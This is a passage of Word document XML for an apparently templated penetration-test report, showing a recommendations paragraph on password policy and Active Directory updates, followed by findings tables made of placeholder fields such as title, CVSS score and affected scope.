    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000D2" w14:textId="01E7D07D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">{name} recommends that {company.name} continues to improve their password policy as an easy method to strengthen their security posture. </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>A majority of</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> the Windows Active Directory system should also be updated to a secure version, as well as focusing more on </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>appropriate privileges</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> for employees.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000D3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645201" w:id="30"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Technical</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000D4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.m2uvmkwk3zdn" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">TODO </w:t>
      </w:r>
      <w:commentRangeStart w:id="662623206"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>ADD PIE CHART OR SOMET</w:t>
      </w:r>
      <w:commentRangeEnd w:id="662623206"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="662623206"/>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>HING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000000D5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000D6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Following vulnerabilities have been discovered:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="5708F3F5" w14:textId="6985420B">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1901"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="4396"/>
      </w:tblGrid>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="3872A957">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1901" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="25F738B7" w14:textId="73402E3D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Vulnerability Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="41B5A25B" w14:textId="5E11C5ED">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="3092F936" w14:textId="21237EFC">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Affected Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4396" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="57BA7960" w14:textId="05724C94">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="267079AE">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1901" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="2EF00B1C" w14:textId="330F8B9A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>{#findings}{title}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="85200C"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="00D8A9F5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{@cvss.cellColor}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="6347C0C6" w14:textId="30D7A5AE">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{cvss.baseMetricScore}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="3C4C6B09" w14:textId="62FAE472">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{@affected | convertHTML}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4396" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="46829D60" w14:textId="7778C73E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>/findings}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="026C47B2" w14:textId="66C11075">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000000FD" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000000FE" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="140"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="000000FF" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="140"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000100" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645202" w:id="32"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Technical</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000101" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645203" w:id="33"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Critical </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> high, </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>mid</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>generation</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000103" w14:textId="5731B060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{#findings}</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1852"/>
        <w:gridCol w:w="1852"/>
        <w:gridCol w:w="2775"/>
        <w:gridCol w:w="3009"/>
      </w:tblGrid>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="513EE10A">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9488" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CC4125"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="16D8A713">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>{@cvss.cellColor}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="45344ADE" w14:textId="0C237915">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>{title}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="3E535A90">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3704" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CC4125"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
